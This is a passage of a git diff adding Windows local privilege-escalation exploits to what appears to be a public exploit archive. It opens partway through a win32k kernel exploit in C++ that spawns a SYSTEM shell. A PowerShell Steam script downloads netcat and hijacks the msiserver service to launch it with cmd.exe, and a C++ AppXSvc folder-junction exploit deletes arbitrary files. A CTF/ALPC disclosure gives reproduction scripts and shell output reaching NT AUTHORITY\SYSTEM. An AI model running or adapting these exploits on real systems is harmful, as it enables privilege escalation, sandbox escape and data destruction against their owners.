+		GetModuleHandleA(NULL));
+	printf("Handle of the mainWindow : 0x%08X\n", (unsigned int)hWindowMain);
+	ShowWindow(hWindowMain, SW_SHOWNOACTIVATE);
+
+	/* Creating the hunt window class */
+	xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x000, xxMainWindowProc);
+	hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
+		WS_EX_LEFT,
+		WS_OVERLAPPEDWINDOW,
+		GetModuleHandleA(NULL));
+	printf("Handle of the huntWindow : 0x%08X\n", (unsigned int)hWindowHunt);
+	
+	/* Hooking the WH_CALLWNDPROC function */
+	SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
+
+	/* Hooking the trackpopupmenuEx WINAPI call */
+	HWINEVENTHOOK hEventHook = SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), xxWindowEventProc,
+		GetCurrentProcessId(), GetCurrentThreadId(), 0);
+
+	/* Setting the root popup menu to null */
+	printf("Setting the root popup menu to null\n");
+	release = 0;
+	TrackPopupMenuEx(hMenuList[0], 0, 0, 0, hWindowMain, NULL);
+
+	/* Allocating the memory at NULL page */
+	*(FARPROC *)&NtAllocateVirtualMemory = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtAllocateVirtualMemory");
+	if (NtAllocateVirtualMemory == NULL)
+		return 1;
+
+	if (!NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(),
+		&MemAddr,
+		0,
+		&MemSize,
+		MEM_COMMIT | MEM_RESERVE,
+		PAGE_READWRITE)) || MemAddr != NULL)
+	{
+		std::cout << "[-]Memory alloc failed!" << std::endl;
+		return 1;
+	}
+	ZeroMemory(MemAddr, MemSize);
+
+	/* Getting the tagWND of the hWindowHunt */
+	PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
+	printf("Address of the win32k!tagWND of hWindowHunt : 0x%08X\n", (unsigned int)head->deskhead.pSelf);
+
+	/* Creating a fake POPUPMENU structure */
+	DWORD dwPopupFake[0x100] = { 0 };
+	dwPopupFake[0x0] = (DWORD)0x1; //->flags
+	dwPopupFake[0x1] = (DWORD)0x1; //->spwndNotify
+	dwPopupFake[0x2] = (DWORD)0x1; //->spwndPopupMenu
+	dwPopupFake[0x3] = (DWORD)0x1; //->spwndNextPopup
+	dwPopupFake[0x4] = (DWORD)0x1; //->spwndPrevPopup
+	dwPopupFake[0x5] = (DWORD)0x1; //->spmenu
+	dwPopupFake[0x6] = (DWORD)0x1; //->spmenuAlternate
+	dwPopupFake[0x7] = (ULONG)head->deskhead.pSelf + 0x12;  //->spwndActivePopup
+	dwPopupFake[0x8] = (DWORD)0x1;  //->ppopupmenuRoot
+	dwPopupFake[0x9] = (DWORD)0x1; //->ppmDelayedFree
+	dwPopupFake[0xA] = (DWORD)0x1;  //->posSelectedItem
+	dwPopupFake[0xB] = (DWORD)0x1; //->posDropped
+	dwPopupFake[0xC] = (DWORD)0;
+
+	/* Copying it to the NULL page */
+	RtlCopyMemory(MemAddr, dwPopupFake, 0x1000);
+
+	/* Allowing to access the NULL page mapped values */
+	release = 1;
+	hwndMenuList[2] = NULL;
+	TrackPopupMenuEx(hMenuList[1], 0, 0, 0, hWindowMain, NULL);
+	
+	/* Freeing the allocated NULL memory */
+	VirtualFree(MemAddr, 0x1000, 0);
+
+	SendMessageW(hWindowHunt, 0x1234, (WPARAM)hwndMenuList[0], 0x11);
+
+	if (success)
+	{
+		STARTUPINFO si = { sizeof(si) };
+		PROCESS_INFORMATION pi = { 0 };
+		si.dwFlags = STARTF_USESHOWWINDOW;
+		si.wShowWindow = SW_SHOW;
+		printf("Getting the shell now...\n");
+		BOOL bRet = CreateProcessA(NULL, (LPSTR)"cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
+		if (bRet)
+		{
+			CloseHandle(pi.hProcess);
+			CloseHandle(pi.hThread);
+		}
+	}
+
+	DestroyWindow(hWindowMain);
+
+	MSG msg = { 0 };
+	while (GetMessageW(&msg, NULL, 0, 0))
+	{
+		TranslateMessage(&msg);
+		DispatchMessageW(&msg);
+	}
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/47238.ps1 b/exploits/windows/local/47238.ps1
new file mode 100644
index 000000000..6502574f8
--- /dev/null
+++ b/exploits/windows/local/47238.ps1
@@ -0,0 +1,30 @@
+$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
+$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" 
+$RegDir = "C:\Windows\Temp\RegLN.exe"
+$PayDir = "C:\Windows\Temp\payload.exe"
+$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
+$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
+$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
+$WebClient = New-Object System.Net.WebClient
+
+
+If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
+{
+$WebClient.DownloadFile($PayDownload, $PayDir)
+$WebClient.DownloadFile($RegDownload, $RegDir)
+}
+
+If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
+{
+Start-Service -DisplayName "Steam Client Service"
+Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+Start-Service -Name "msiserver"
+}
+Else
+{
+Remove-Item -Path $SteamRegKey -Recurse
+Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
+Start-Service -DisplayName "Steam Client Service"
+Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+Start-Service -Name "msiserver"
+}
\ No newline at end of file
diff --git a/exploits/windows/local/47253.cpp b/exploits/windows/local/47253.cpp
new file mode 100644
index 000000000..a364e333b
--- /dev/null
+++ b/exploits/windows/local/47253.cpp
@@ -0,0 +1,244 @@
+/*
+# Author : Abdelhamid Naceri
+# Discovered On : 13/08/2019
+# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc
+Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion
+from a low integrity user .
+# Still Unpatched On 13/08/2019
+Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
+*/
+#include"windows.h"
+#include"iostream"
+#include"conio.h"
+#include"stdio.h"
+#include"tlhelp32.h"
+#include"cstdio"
+#include"wchar.h"
+#include"process.h"
+#include"wchar.h"
+#include"string"
+#include"tchar.h"
+
+#pragma warning(disable : 4996)
+#pragma comment(lib, "advapi32.lib")
+#ifndef UNICODE  
+typedef std::string String;
+#else
+typedef std::wstring String;
+#endif
+
+using namespace std;
+
+bool FileExists(const wchar_t* file) {
+	if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND)
+	{
+		return false;
+	}
+	else {
+		return true;
+	}
+}
+
+void remove_dir(const wchar_t* folder)
+{
+	std::wstring search_path = std::wstring(folder) + _T("/*.*");
+	std::wstring s_p = std::wstring(folder) + _T("/");
+	WIN32_FIND_DATA fd;
+	HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd);
+	if (hFind != INVALID_HANDLE_VALUE) {
+		do {
+			if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
+				if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0)
+				{
+					remove_dir((wchar_t*)(s_p + fd.cFileName).c_str());
+				}
+			}
+			else {
+				DeleteFile((s_p + fd.cFileName).c_str());
+			}
+		} while (::FindNextFile(hFind, &fd));
+		::FindClose(hFind);
+		_wrmdir(folder);
+	}
+}
+
+void killProcessByName(const wchar_t* filename)
+{
+	HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
+	PROCESSENTRY32 pEntry;
+	pEntry.dwSize = sizeof(pEntry);
+	BOOL hRes = Process32First(hSnapShot, &pEntry);
+	while (hRes)
+	{
+		if (wcscmp(pEntry.szExeFile, filename) == 0)
+		{
+			HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
+				(DWORD)pEntry.th32ProcessID);
+			if (hProcess != NULL)
+			{
+				TerminateProcess(hProcess, 9);
+				CloseHandle(hProcess);
+			}
+		}
+		hRes = Process32Next(hSnapShot, &pEntry);
+	}
+	CloseHandle(hSnapShot);
+}
+
+bool IsProcessRunning(const wchar_t* processName)
+{
+	bool exists = false;
+	PROCESSENTRY32 entry;
+	entry.dwSize = sizeof(PROCESSENTRY32);
+
+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
+
+	if (Process32First(snapshot, &entry))
+		while (Process32Next(snapshot, &entry))
+			if (!_wcsicmp(entry.szExeFile, processName))
+				exists = true;
+
+	CloseHandle(snapshot);
+	return exists;
+}
+
+bool dirExists(const std::string& dirName_in)
+{
+	DWORD ftyp = GetFileAttributesA(dirName_in.c_str());
+	if (ftyp == INVALID_FILE_ATTRIBUTES)
+		return false;
+
+	if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
+		return true;
+
+	return false;
+}
+
+void KillEdge()
+{
+	killProcessByName(L"MicrosoftEdge.exe");
+}
+
+void StartEdge() 
+{
+	try
+	{
+		system("start microsoft-edge:");
+	}
+	catch (...){}
+}
+
+void exploit(const char* path) {
+	//Inintializing the variable before begining
+	int attempt = 0;
+	string command;
+	wchar_t* userprofile = _wgetenv(L"USERPROFILE");
+	const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
+	//I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution
+	//I deleted him first
+	const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
+	wstring froamingpath(userprofile);
+	froamingpath += wstring(roamingpath);
+	wstring fullpath(userprofile);
+	fullpath += std::wstring(relpath);
+	wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
+	wstring fpath(szBuffsrc);
+	string strfpath(fpath.begin(), fpath.end());
+	//Check If MS-Edge Need To Write DACL Or Not
+
+	if (dirExists(strfpath) != true) { 
+		printf("[!] Wait MS-Edge Need To Write The DACL");
+		StartEdge();
+		for (;;) {
+			Sleep(1000);
+			if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
+		}
+		StartEdge();
+		Sleep(7000);
+		KillEdge();
+		printf("\r                                      ");
+	
+	}
+
+	//End Of Check
+	printf("\r# Author : Abdelhamid Naceri\n");
+	printf("# Tested On Windows 10 32&64bit\n");
+	printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
+	printf("[+] Checking If Path Exist ...");
+	Sleep(2000);
+	if (dirExists(path) != true) { 
+		printf("Your Path Is Invalid"); 
+		ExitProcess(EXIT_FAILURE); }
+	else { 
+		printf("Exist !\n");
+		KillEdge();
+		printf("[+] Starting MS-Edge ...\n");
+		StartEdge();
+		Sleep(4000);
+		printf("[+] Killing MS-Edge ...\n");
+		KillEdge();
+		Sleep(3000);
+		printf("[+] Wipping MS-Edge Directory ...\n");
+		killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files
+		remove_dir(roamingpath);
+		remove_dir(szBuffsrc);
+		Sleep(2000);
+		remove_dir(szBuffsrc);
+		printf("[+] Checking If Directory Exist Anymore ...");
+		if (dirExists(strfpath) == true) {
+			
+			if (dirExists(strfpath) == true) {
+				printf("Something Went Wrong");
+				printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
+				command = "explorer ";
+				command.append(strfpath);
+				system(command.c_str());
+				_getch();
+				goto Continue;
+			}
+		}
+		else {
+Continue:
+			printf(" Done\n");
+			Sleep(3000);
+			printf("[+] Attempting to Create Junction To Target ...\n");
+			command = "mklink /J ";
+			command.append("\"");
+			command.append(strfpath);
+			command.append("\"");
+			command.append(" ");
+			command.append("\"");
+			command.append(path);
+			command.append("\"");
+			system(command.c_str());
+			printf("Done\n");
+			Sleep(3000);
+			printf("[+] Firing Up MS-Edge Again ...\n");
+			StartEdge();
+			do { Sleep(1000);  } while (IsProcessRunning(L"MicrosoftEdge.exe"));
+			Sleep(3000);
+			StartEdge();
+			command = "explorer ";
+			command.append(path);
+			printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
+			system(command.c_str());
+			printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
+			_getch();
+			printf("Cleaning ...");
+			_wremove(szBuffsrc);
+			_wrmdir(szBuffsrc);
+			ExitProcess(EXIT_SUCCESS);
+		}
+	}
+}
+
+int main(int argc, char* argv[]) {
+	if (argc == 2) {exploit(argv[1]);}
+	else { 
+		printf("# Author : Abdelhamid Naceri\n");
+		printf("# Tested On Windows 10 1903 32&64bit\n");
+		printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
+		printf("[!] Usage : poc.exe TargetPath");
+	}
+	return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/47258.txt b/exploits/windows/local/47258.txt
new file mode 100644
index 000000000..d8c2503a8
--- /dev/null
+++ b/exploits/windows/local/47258.txt
@@ -0,0 +1,356 @@
+The msctf subsystem is part of the Text Services Framework, The TSF manages things like input methods, keyboard layouts, text processing and so on. There are two main components, the ctfmon server and the msctf client.
+
+The ctfmon service creates an ALPC port in a well known location, to which clients connect and exchange messages. When any process creates a window, the kernel invokes a callback, USER32!CtfHookProcWorker, that automatically loads the CTF client.
+
+The CTF subsystem is vast and complex. It was most likely designed for LPC in Windows NT and bolted onto ALPC when it became available in Vista and later. The code is clearly dated with many legacy design decisions. In fact, the earliest version of MSCTF I've been able to find was from the 2001 release of Office XP, which even supported Windows 98. It was later included with Windows XP as part of the base operating system.
+
+There are multiple critical design flaws in this system, I've written a detailed technical analysis and an interactive utility to probe the CTF subsystem.
+
+$ ./ctftool.exe
+An interactive ctf exploration tool by @taviso.
+Type "help" for available commands.
+Most commands require a connection, see "help connect".
+ctf> help
+Type `help <command>` for help with a specific command.
+Any line beginning with # is considered a comment.
+
+help            - List available commands.
+exit            - Exit the shell.
+connect         - Connect to CTF ALPC Port.
+info            - Query server informaiton.
+scan            - Enumerate connected clients.
+callstub        - Ask a client to invoke a function.
+createstub      - Ask a client to instantiate CLSID.
+hijack          - Attempt to hijack an ALPC server path.
+sendinput       - Send keystrokes to thread.
+setarg          - Marshal a parameter.
+getarg          - Unmarshal a parameter.
+wait            - Wait for a process and set it as the default thread.
+thread          - Set the default thread.
+sleep           - Sleep for specified milliseconds.
+forget          - Forget all known stubs.
+stack           - Print the last leaked stack ptr.
+marshal         - Send command with marshalled parameters.
+proxy           - Send command with proxy parameters.
+call            - Send command without appended data.
+window          - Create and register a message window.
+patch           - Patch a marshalled parameter.
+module          - Print the base address of a module.
+module64        - Print the base address of a 64bit module.
+editarg         - Change the type of a marshalled parameter.
+symbol          - Lookup a symbol offset from ImageBase.
+set             - Change or dump various ctftool parameters.
+show            - Show the value of special variables you can use.
+lock            - Lock the workstation, switch to Winlogon desktop.
+repeat          - Repeat a command multiple times.
+run             - Run a command.
+script          - Source a script file.
+print           - Print a string.
+consent         - Invoke the UAC consent dialog.
+reg             - Lookup a DWORD in the registry.
+Most commands require a connection, see "help connect".
+ctf> connect
+The ctf server port is located at \BaseNamedObjects\msctf.serverDefault2
+NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault2") => 0
+Connected to CTF server@\BaseNamedObjects\msctf.serverDefault2, Handle 00000248
+ctf> info
+The server responded.
+000000: 20 00 38 00 02 10 00 00 ec 04 00 00 a4 1a 00 00   .8.............
+000010: dc b6 00 00 35 1b 2e 00 38 00 00 00 20 2a 00 00  ....5...8... *..
+000020: 00 00 00 00 00 00 00 00 ec 04 00 00 00 00 00 00  ................
+000030: 00 00 00 00 00 00 00 00                          ........
+        Monitor PID: 1260
+ctf>
+
+Please see the attached document for a detailed analysis, but here are my major concerns with the service:
+
+1. The ctfmon ALPC port is accessible across sessions, allowing users to compromise other users of the system.
+2. UIPI can be bypassed, sending input events to higher integrity windows. This is an AppContainer or IL sandbox escape.
+3. The msctf client disables UIPI for Marshal event windows. As far as I can tell, this is unnecessary, only ctfmon should be sending these messages, which is already high integrity.
+4. The MSG_CALLSTUB command does not validate the command index, allowing arbitrary code execution.
+   4a. Frankly, even if you call a legitimate stub, you’re often trusted to Marshal pointers across the interface. 
+
+Many of the legitimate functions expect pointers with no validation (For example, CInputProcessorProfiles::Register, which is called via CStubITfInputProcessorProfileMgr::stub_ActivateProfile, FunctionIndex 3 for TfInputProcessorProfileMgr)
+
+5. There is no mutual authentication of Servers or Clients, therefore:
+   5a. You can hijack the alpc server path for other sessions and wait for clients to connect to you, then send them input.
+   5b. You can lie about your ThreadId, ProcessId and HWND, effectively redirecting messages from other clients.
+
+I'm planning to write a full SYSTEM exploit for these issues, because I think it's interesting and I've already invested a ton of work to get the tool working to make a PoC :)
+
+I assume you'll want a copy when it's finished.
+
+Interfering with processes across sessions
+------------------------------------------
+
+To reproduce, follow these steps:
+* Login as an Administrator to Session 1.
+* Please make sure that you do not have an open copy of notepad.
+* Use Fast User Switching (i.e. Ctrl-Alt-Del, Switch User) to create an unprivileged standard user session.
+* Create a file containing these commands:
+
+connect Default 1
+Sleep 10000
+wait notepad.exe
+createstub 0 4 IID_ITfInputProcessorProfileMgr
+setarg 6
+setarg 0x201 0x41414141
+setarg 0x20001 0x41414142
+setarg 0x1 ABABABAB-ABAB-ABAB-ABAB-ABABABABABAB
+setarg 0x1 BCBCBCBC-BCBC-BCBC-BCBC-BCBCBCBCBCBC
+setarg 0x10001 0x41414145
+setarg 0x201 0x41414146
+callstub 0 0 3
+quit
+
+Run the following command:
+
+PS Z:\Home> cat .\script.txt | .\ctftool.exe
+
+* Use fast user switching to return to Session 1.
+* Run windbg -c g ‘notepad.exe’
+* Wait 10 seconds, observe that notepad dereferences 0x41414141.
+
+This proves that an unprivileged user can interact with processes on a privileged session.
+
+UIPI can be bypassed, sending input events to higher integrity windows.
+-----------------------------------------------------------------------
+
+Use the following command to make ctftool.exe Low Integrity:
+
+> icacls ctftool.exe /setintegritylevel low
+
+Observe that the tool can still connect, scan, and interact with Windows.
+
+The msctf client disables UIPI for Marshal event windows.
+---------------------------------------------------------
+
+msctf!SYSTHREAD::LockThreadMessageWindow allows Marshal messages across integrity levels, I suspect this is a bug and unnecessary.
+
+The MSG_CALLSTUB command does not validate the command index.
+-------------------------------------------------------------
+
+This is the (decompiled) code that handles MSG_CALLSTUB (Command 0xA, I just guessed the name):
+
+    // Get pointer to appended Data
+    ProxyInfo = MsgBase::GetProxyInfoPtr(*MessagePtr);
+    if ( ProxyInfo )
+    {
+      ms_exc.registration.TryLevel = 0;
+      Systhread = this->Systhread;
+      if ( Systhread->StubArray )
+      {
+        FoundStub = 0;
+        FindStub(Systhread->StubArray, ProxyInfo->StubId, &FoundStub);
+        if ( FoundStub )
+        {
+          if ( FoundStub->TimeStamp == ProxyInfo->TimeStamp )
+            Result = FoundStub->vtbl->invoke(FoundStub, ProxyInfo->FunctionIndex, MessagePtr);
+        }
+      }
+      ms_exc.registration.TryLevel = -2;
+    }
+    return Result;
+
+Here, MessagePtr and ProxyInfo are entirely untrusted data, but that is then used to call an arbitrary index from a table, and the invoke method looks like this:
+
+int __thiscall CStubITfCompartment::Invoke(CStubITfCompartment *this, unsigned int FunctionIndex, struct MsgBase **Msg)
+{
+  return (*(&CStubITfCompartment::_StubTbl + FunctionIndex))(this, Msg);
+}
+
+(All the Invoke functions look similar)
+
+Reproduce like this:
+
+PS Z:\Home> .\ctftool.exe
+An interactive ctf exploration tool by @taviso.
+Type "help" for available commands.
+ctf> connect
+The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
+ctf> scan
+Client 0, Tid 3976 (Flags 0x08, Hwnd 00000F88, Pid 4012, explorer.exe)
+Client 1, Tid  780 (Flags 0x08, Hwnd 0000030C, Pid 4012, explorer.exe)
+Client 2, Tid  692 (Flags 0x08, Hwnd 000002B4, Pid 4012, explorer.exe)
+Client 3, Tid 4420 (Flags 0x0c, Hwnd 00001144, Pid 4352, SearchUI.exe)
+Client 4, Tid 7964 (Flags 0x08, Hwnd 00001F1C, Pid 7920, conhost.exe)
+Client 5, Tid 7116 (Flags 0x08, Hwnd 00001BCC, Pid 7112, procexp.exe)
+Client 6, Tid 9616 (Flags 0000, Hwnd 00002590, Pid 2096, ctfmon.exe)
+Client 7, Tid 9048 (Flags 0x08, Hwnd 00002358, Pid 11660, windbg.exe)
+Client 8, Tid 1020 (Flags 0x08, Hwnd 000003FC, Pid 4652, notepad.exe)
+Client 9, Tid 11620 (Flags 0000, Hwnd 00002D64, Pid 3776, ctftool.exe)
+ctf> createstub 1020 4 IID_ITfInputProcessorProfileMgr
+Command succeeded, stub created
+Dumping Marshal Parameter 3 (Base 00CAA4B0, Type 0x106, Size 0x18, Offset 0x40)
+000000: 4c e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c  L..q(....*..[.C\
+000010: 01 00 00 00 33 01 61 12                          ....3.a.
+Marshalled Value 3, COM {71C6E74C-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x12610133
+ctf> setarg 6
+New Parameter Chain, Length 6
+ctf> setarg 0x201 0x41414141
+Marshalled Value 0, INT 0000000041414141
+ctf> setarg 0x201 0x41414146
+Marshalled Value 1, INT 0000000041414146
+ctf> setarg 0x201 0x41414146
+Marshalled Value 2, INT 0000000041414146
+ctf> setarg 0x201 0x41414146
+Marshalled Value 3, INT 0000000041414146
+ctf> setarg 0x201 0x41414146
+Marshalled Value 4, INT 0000000041414146
+ctf> setarg 0x201 0x41414146
+Marshalled Value 5, INT 0000000041414146
+ctf> callstub 0 0 0xffff
+Sending the Proxy data failed, 0x80004005
+ctf> q
+
+
+There is no mutual authentication of clients and servers.
+----------------------------------------------------------
+
+To reproduce this issue, as an unprivileged session use the command `hijack` to create a new ALPC server, then create a privileged session.
+
+For example, `hijack Default 2`, to hijack the server for session 2 on the default desktop.
+
+When the new session is created, the tool will dump information as new privileged clients attempt to connect to the fake service.
+
+PS: Z:\Home> .\ctftool.exe
+An interactive ctf exploration tool by @taviso.
+Type "help" for available commands.
+ctf> hijack Default 1
+NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
+NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
+000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00  ..0.. ......D...
+000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00  .....f......D...
+000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05  ............ ...
+A a message received
+        ProcessID: 4352, SearchUI.exe
+        ThreadId: 4420
+        WindowID: 00020180
+NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
+000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00  ..0.. ..........
+000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00  .y...f..........
+000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00  ................
+A a message received
+        ProcessID: 4012, explorer.exe
+        ThreadId: 780
+        WindowID: 00010110
+NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
+000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00  ..0.. ..........
+000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00  ....*g..........
+000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00  ............X...
+A a message received
+        ProcessID: 4012, explorer.exe
+        ThreadId: 780
+...
+
+Notes on the tool
+-----------------
+
+* I have only tested it on Windows 10.
+* The tool is interactive and uses readline, type help for a list of commands.
+* You can have the source if you like, please let me know.
+* The tool is unfinished, I plan to make a full working exploit but wanted to get the ball rolling on disclosure.
+
+
+The code has been tested with latest Win10 x64 as of 05/21, but I had to hardcode some offsets.
+
+In particular, I have msctf.dll 10.0.17763.348 and kernelbase.dll 10.0.17763.475 (I think those are the only two relevant modules).
+
+1. As an unprivileged user, execute `query user` to see all the others users on the system.
+
+2. Open ctfmonexploit.ctf in notepad, and set the connect line to the sessionid you want to compromise.  
+
+3.  Copy the exploit payload dll into c:\Windows\Temp, call it exploit.dll.
+
+4.  Run `icacls c:\Windows\Temp\exploit.dll /grant "Everyone:(RX)"`
+
+5.  Run `cat ctfmonexploit.ctf | .\ctftool.exe`
+ 
+6. The dll is loaded into a High Integrity process of the specified session when the session is next active.
+
+
+I got this attack working from unprivileged user to SYSTEM, even from LPAC.
+
+The trick is to switch to the WinLogon desktop, which an unprivileged user can do using USER32!LockWorkstation().
+
+PS Z:\Home\Documents\Projects\alpc> .\ctftool.exe
+An interactive ctf exploration tool by @taviso.
+Type "help" for available commands.
+Most commands require a connection, see "help connect".
+ctf> connect Winlogon 1
+The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1
+NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon1") => 0xc0000034
+Waiting for the specified port to appear...
+NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon1") => 0
+Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 00000224
+ctf> scan
+Client 0, Tid 6324 (Flags 0000, Hwnd 000018B4, Pid 4020, ctftool.exe)
+Client 1, Tid 4656 (Flags 0x1000000c, Hwnd 00001230, Pid 2336, LogonUI.exe)
+Client 2, Tid 8692 (Flags 0x1000000c, Hwnd 000021F4, Pid 2336, LogonUI.exe)
+Client 3, Tid 4808 (Flags 0x10000008, Hwnd 000012C8, Pid 4440, TabTip.exe)
+Client 4, Tid 8800 (Flags 0x1000000c, Hwnd 00002260, Pid 8536, Utilman.exe)
+Client 5, Tid 6788 (Flags 0x10000008, Hwnd 00001A84, Pid 6628, osk.exe)
+
+
+I finished the exploit, it reliably gets NT AUTHORITY\SYSTEM from an unprivileged user on up-to-date Windows 10 1903.
+
+I sent Microsoft a finished version.
+
+Here is the current source code, and a video demonstrating it. I think the best targets are either logonui.exe or consent.exe, both run as SYSTEM.
+
+https://www.youtube.com/watch?v=JUbac3OLPaM
+
+$ ./ctftool.exe 
+An interactive ctf exploration tool by @taviso.
+Type "help" for available commands.
+Most commands require a connection, see "help connect".
+ctf> script .\scripts\ctf-consent-system.ctf
+Attempting to copy exploit payload...
+        1 file(s) copied.
+
+Right click something and select "Run as Administrator", then wait for a SYSTEM shell...
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+
+The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
+Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 00000244
+Waiting for the consent dialog to join the session...
+Found new client consent.exe, DefaultThread now 6900
+consent.exe has joined the session, starting exploit...
+Command succeeded, stub created
+Dumping Marshal Parameter 3 (Base 011E89C0, Type 0x106, Size 0x18, Offset 0x40)
+000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c  M..q(....*..[.C\
+000010: 01 00 00 00 6c 4a af 03                          ....lJ..
+Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x3af4a6c
+0x7ff8cf290000
+0x7ff8cf340000
+0x7ff8cffe0000
+0x7ff8cf340000
+Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL
+C:\WINDOWS\system32\kernel32.DLL is a 64bit module.
+kernel32!LoadLibraryA@0x180000000+0x1eb60
+The CFG call chain is built, writing in parameters...
+Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
+0x7ff8cfc40000
+Payload created and call chain ready, get ready...
+C:\WINDOWS\system32>whoami
+nt authority\system
+
+
+If you have an input profile with enhanced capabilities available (in general, if you use an IME then you do - Chinese, Korean, Japanese, etc.), then a low privileged application on the same session can read and write data to a higher privileged application.
+
+The user doesn't need to have the language selected, because a CTF client can change active profile too, but it does have to be installed.
+
+The problem with this is that a low privileged application can take control of an elevated command prompt, escape a low-integrity sandbox, escape AppContainer/LPAC, read passwords out of login dialogs/consent dialogs, and so on.
+
+This means UIPI basically doesn't work any more.
+
+I've attached a ctf script that will wait for you to open notepad, and then write some text into it. Here is a screenshot of a low privileged ctftool typing into an Administrator console.
+
+Please note, if you *only* have languages installed that doesn't use an Out-of-process TIP (English, German, French, Polish, etc), you are likely unaffected (or at least, I don't know how to exploit it yet). Right now, it's mostly users in Asia affected by this, but I'm admittedly ignorant about i18n and a11y.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47258.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47306.txt b/exploits/windows/local/47306.txt
new file mode 100644
index 000000000..0e1dffb49
--- /dev/null
